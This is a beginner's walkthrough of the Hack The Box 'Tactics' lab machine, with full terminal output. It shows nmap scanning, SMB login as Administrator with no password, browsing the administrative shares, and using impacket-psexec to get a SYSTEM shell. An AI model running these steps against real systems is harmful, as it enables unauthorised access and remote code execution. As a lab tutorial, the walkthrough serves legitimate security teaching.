The aim of this walkthrough is to provide help with the Tactics machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
We could use the unset command to remove it after we no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?
We start out with a quick connection test.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ ping $rhost -c 4
PING 10.129.118.218 (10.129.118.218) 56(84) bytes of data.
64 bytes from 10.129.118.218: icmp_seq=1 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=2 ttl=127 time=10.4 ms
64 bytes from 10.129.118.218: icmp_seq=3 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=4 ttl=127 time=10.6 ms
--- 10.129.118.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 10.392/10.645/10.836/0.174 ms
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Running nmap without any options does not work, but it does in fact gives us a hint.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:18 BST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
So let’s try it.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap -Pn $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:21 BST
Nmap scan report for 10.129.118.218
Host is up (0.013s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Three (top) ports appear to be open: 135, 139 and 445.
Let’s check these reported services for some more information.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap -p135,139,445 -Pn -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:38 BST
Nmap scan report for 10.129.118.218
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-05-10T21:38:14
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
-Pn
TASK 2
Question: What does the 3-letter acronym SMB stand for?
A quick online search can do wonders…
server message block
TASK 3
Question: What port does SMB use to operate at?
Online research, just like in the previous task.
445
TASK 4
Question: What command line argument do you give to `smbclient` to list available shares?
Using the command’s built-in help option should gives us a hand here.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
...
-L, --list=HOST Get a list of shares available on a host
...
Trying out the default Administrator account and hoping that it is misconfigured (without any password) does not disappoint.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient -L $rhost -U Administrator
Password for [WORKGROUP\Administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Three shares are listed on our target machine.
-L
TASK 5
Question: What character at the end of a share name indicates it's an administrative share?
Looking at the reported shares from TASK4, it must be $. But let’s try and access the shares:
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient //$rhost/ADMIN$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 20 17:02:48 2021
.. D 0 Mon Sep 20 17:02:48 2021
$Reconfig$ D 0 Mon Sep 20 17:02:49 2021
ADFS D 0 Sat Sep 15 08:19:03 2018
appcompat D 0 Sat Sep 15 08:19:00 2018
apppatch D 0 Mon Oct 29 22:39:47 2018
AppReadiness D 0 Wed Apr 21 16:39:36 2021
assembly DR 0 Sat Sep 15 10:09:13 2018
bcastdvr D 0 Sat Sep 15 08:19:00 2018
bfsvc.exe A 78848 Sat Sep 15 08:12:58 2018
Boot D 0 Sat Sep 15 08:19:01 2018
bootstat.dat AS 67584 Wed May 10 22:15:58 2023
Branding D 0 Sat Sep 15 08:19:01 2018
CbsTemp D 0 Wed Jul 7 19:00:03 2021
Containers D 0 Sat Sep 15 08:19:01 2018
Cursors D 0 Sat Sep 15 08:19:04 2018
debug D 0 Wed Apr 21 16:17:15 2021
diagnostics D 0 Sat Sep 15 08:19:01 2018
DigitalLocker D 0 Sat Sep 15 10:05:40 2018
Downloaded Program Files DS 0 Sat Sep 15 08:19:04 2018
drivers D 0 Sat Sep 15 08:19:01 2018
DtcInstall.log A 1947 Wed Apr 21 16:16:44 2021
ELAMBKUP DH 0 Sat Sep 15 08:19:04 2018
en-US D 0 Sat Sep 15 10:05:40 2018
explorer.exe A 4245280 Mon Oct 29 22:39:24 2018
Fonts DSR 0 Sat Sep 15 08:19:04 2018
Globalization D 0 Sat Sep 15 08:19:01 2018
Help D 0 Sat Sep 15 10:05:40 2018
HelpPane.exe A 1065472 Sat Sep 15 08:12:46 2018
hh.exe A 18432 Sat Sep 15 08:12:48 2018
IdentityCRL D 0 Sat Sep 15 08:19:04 2018
IME D 0 Sat Sep 15 10:05:40 2018
ImmersiveControlPanel DR 0 Wed Apr 21 16:16:42 2021
INF D 0 Wed May 10 22:09:44 2023
InputMethod D 0 Sat Sep 15 08:19:01 2018
Installer DHS 0 Wed Jul 7 19:05:00 2021
L2Schemas D 0 Sat Sep 15 08:19:04 2018
LiveKernelReports D 0 Sat Sep 15 08:19:01 2018
Logs D 0 Tue Sep 21 17:33:25 2021
lsasetup.log A 1380 Wed Apr 21 16:16:02 2021
media DSR 0 Sat Sep 15 08:19:04 2018
mib.bin A 43131 Sat Sep 15 08:12:40 2018
Microsoft.NET DR 0 Wed May 10 22:15:59 2023
Migration D 0 Sat Sep 15 08:19:01 2018
ModemLogs D 0 Sat Sep 15 08:19:01 2018
notepad.exe A 254464 Sat Sep 15 08:12:38 2018
OCR D 0 Sat Sep 15 10:07:04 2018
Offline Web Pages DR 0 Sat Sep 15 08:19:05 2018
Panther D 0 Wed Apr 21 16:16:50 2021
Performance D 0 Sat Sep 15 08:19:01 2018
PFRO.log A 1708 Mon Sep 27 11:26:45 2021
PLA D 0 Sat Sep 15 08:19:01 2018
PolicyDefinitions D 0 Sat Sep 15 10:08:05 2018
Prefetch Dn 0 Wed Apr 21 16:16:20 2021
PrintDialog DR 0 Wed Apr 21 16:16:43 2021
Provisioning D 0 Sat Sep 15 08:19:01 2018
regedit.exe A 358400 Sat Sep 15 08:12:52 2018
Registration D 0 Wed May 10 22:05:37 2023
RemotePackages D 0 Sat Sep 15 08:19:01 2018
rescache D 0 Sat Sep 15 08:19:01 2018
Resources D 0 Sat Sep 15 08:19:01 2018
SchCache D 0 Sat Sep 15 08:19:01 2018
schemas D 0 Sat Sep 15 08:19:01 2018
security D 0 Sat Sep 15 08:19:01 2018
ServerStandard.xml A 30931 Sat Sep 15 08:13:27 2018
ServiceProfiles D 0 Wed Apr 21 16:16:04 2021
ServiceState D 0 Sat Sep 15 08:19:01 2018
servicing D 0 Sat Sep 15 10:06:36 2018
Setup D 0 Sat Sep 15 08:21:38 2018
ShellComponents D 0 Sat Sep 15 08:19:05 2018
ShellExperiences D 0 Sat Sep 15 08:19:05 2018
SKB D 0 Sat Sep 15 08:19:01 2018
SoftwareDistribution D 0 Wed Apr 21 16:23:54 2021
Speech D 0 Sat Sep 15 08:19:01 2018
Speech_OneCore D 0 Sat Sep 15 08:19:01 2018
splwow64.exe A 132096 Sat Sep 15 08:13:30 2018
System D 0 Sat Sep 15 08:19:01 2018
system.ini A 219 Sat Sep 15 08:16:48 2018
System32 D 0 Wed May 10 22:09:44 2023
SystemApps D 0 Sat Sep 15 08:19:01 2018
SystemResources D 0 Sat Sep 15 08:19:01 2018
SysWOW64 D 0 Wed Jul 7 19:04:43 2021
TAPI D 0 Tue Sep 21 17:51:49 2021
Tasks D 0 Wed Apr 21 16:16:18 2021
Temp D 0 Wed May 10 22:16:17 2023
TextInput D 0 Sat Sep 15 08:19:14 2018
tracing D 0 Sat Sep 15 08:19:01 2018
twain_32 D 0 Sat Sep 15 08:19:14 2018
twain_32.dll A 64512 Sat Sep 15 08:13:11 2018
Vss D 0 Sat Sep 15 08:19:01 2018
WaaS D 0 Sat Sep 15 08:19:01 2018
Web D 0 Sat Sep 15 08:19:01 2018
win.ini A 92 Sat Sep 15 08:16:48 2018
WindowsShell.Manifest AHR 670 Sat Sep 15 08:12:40 2018
WindowsUpdate.log A 276 Wed May 10 22:05:41 2023
winhlp32.exe A 11776 Sat Sep 15 08:13:11 2018
WinSxS D 0 Wed Jul 7 18:46:29 2021
WMSysPr9.prx A 316640 Sat Sep 15 08:12:02 2018
write.exe A 11264 Sat Sep 15 08:12:55 2018
3774463 blocks of size 4096. 1156502 blocks available
smb: \> pwd
Current directory is \\10.129.118.218\ADMIN$\
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
It looks like the ADMIN$ share contains the Windows system files. How about the other two?
We get lucky once we look around the C$ share. We find the final flag, located at - \\$rhost\C$\Users\Administrator\Desktop\flag.txt -, so we download it to our local machine.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient //$rhost/C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Wed Apr 21 16:23:49 2021
Config.Msi DHS 0 Wed Jul 7 19:04:56 2021
Documents and Settings DHSrn 0 Wed Apr 21 16:17:12 2021
pagefile.sys AHS 738197504 Wed May 10 22:05:32 2023
PerfLogs D 0 Sat Sep 15 08:19:00 2018
Program Files DR 0 Wed Jul 7 19:04:24 2021
Program Files (x86) D 0 Wed Jul 7 19:03:38 2021
ProgramData DH 0 Tue Sep 13 17:27:53 2022
Recovery DHSn 0 Wed Apr 21 16:17:15 2021
System Volume Information DHS 0 Wed Apr 21 16:34:04 2021
Users DR 0 Wed Apr 21 16:23:18 2021
Windows D 0 Wed Jul 7 19:05:23 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \> cd Users
smb: \Users\> ls
. DR 0 Wed Apr 21 16:23:18 2021
.. DR 0 Wed Apr 21 16:23:18 2021
Administrator D 0 Wed Apr 21 16:23:32 2021
All Users DHSrn 0 Sat Sep 15 08:28:48 2018
Default DHR 0 Wed Apr 21 16:17:12 2021
Default User DHSrn 0 Sat Sep 15 08:28:48 2018
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
Public DR 0 Wed Apr 21 16:23:31 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\> cd Administrator
smb: \Users\Administrator\> ls
. D 0 Wed Apr 21 16:23:32 2021
.. D 0 Wed Apr 21 16:23:32 2021
3D Objects DR 0 Wed Apr 21 16:23:31 2021
AppData DH 0 Wed Apr 21 16:23:19 2021
Application Data DHSrn 0 Wed Apr 21 16:23:19 2021
Contacts DR 0 Wed Apr 21 16:23:31 2021
Cookies DHSrn 0 Wed Apr 21 16:23:19 2021
Desktop DR 0 Thu Apr 22 08:16:03 2021
Documents DR 0 Wed Apr 21 16:23:32 2021
Downloads DR 0 Wed Jul 7 18:44:36 2021
Favorites DR 0 Wed Apr 21 16:23:31 2021
Links DR 0 Wed Apr 21 16:23:32 2021
Local Settings DHSrn 0 Wed Apr 21 16:23:19 2021
Music DR 0 Wed Apr 21 16:23:32 2021
My Documents DHSrn 0 Wed Apr 21 16:23:19 2021
NetHood DHSrn 0 Wed Apr 21 16:23:19 2021
NTUSER.DAT AHn 786432 Tue Sep 13 17:29:05 2022
ntuser.dat.LOG1 AHS 65536 Wed Apr 21 16:23:18 2021
ntuser.dat.LOG2 AHS 238592 Wed Apr 21 16:23:18 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Wed Apr 21 10:03:39 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Apr 21 16:23:19 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Apr 21 16:23:19 2021
ntuser.ini HS 20 Wed Apr 21 16:23:19 2021
Pictures DR 0 Wed Apr 21 16:23:31 2021
PrintHood DHSrn 0 Wed Apr 21 16:23:19 2021
Recent DHSrn 0 Wed Apr 21 16:23:19 2021
Saved Games DR 0 Wed Apr 21 16:23:32 2021
Searches DR 0 Wed Apr 21 16:23:32 2021
SendTo DHSrn 0 Wed Apr 21 16:23:19 2021
Start Menu DHSrn 0 Wed Apr 21 16:23:19 2021
Templates DHSrn 0 Wed Apr 21 16:23:19 2021
Videos DR 0 Wed Apr 21 16:23:31 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Thu Apr 22 08:16:03 2021
.. DR 0 Thu Apr 22 08:16:03 2021
desktop.ini AHS 282 Wed Apr 21 16:23:32 2021
flag.txt A 32 Fri Apr 23 10:39:00 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\Desktop\> pwd
Current directory is \\10.129.118.218\C$\Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
$
TASK 6
Question: Which Administrative share is accessible on the box that allows users to view the whole file system?
The answer should be quite simple since we used the same exact share in TASK5 to download our flag file.
C$
TASK 7
Question: What command can we use to download the files we find on the SMB Share?
Again, we used the same command to download the flag file in TASK5.
get
TASK 8
Question: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?
Optionally, we could use impacket's psecec tool to spawn a shell in the ADMIN$ share. Then accessing the flag after we located it becomes quite simple.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Requesting shares on 10.129.118.218.....
[*] Found writable share ADMIN$
[*] Uploading file qbvrkWIQ.exe
[*] Opening SVCManager on 10.129.118.218.....
[*] Creating service UNVK on 10.129.118.218.....
[*] Starting service UNVK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd ..
C:\Windows>cd \Users\
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is EEE0-FCDB
Directory of C:\Users\Administrator\Desktop
04/22/2021 12:16 AM <DIR> .
04/22/2021 12:16 AM <DIR> ..
04/23/2021 02:39 AM 32 flag.txt
1 File(s) 32 bytes
2 Dir(s) 4,736,704,512 bytes free
C:\Users\Administrator\Desktop>type flag.txt
<flag>
C:\Users\Administrator\Desktop>
psexec.py
SUBMIT FLAG
Question: Submit root flag
Simply grabbing the downloaded flag file from TASK5 should do it.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ cat flag.txt
<flag>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Optionally, we could use impacket's psecec tool as we did in TASK8.
flag
Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!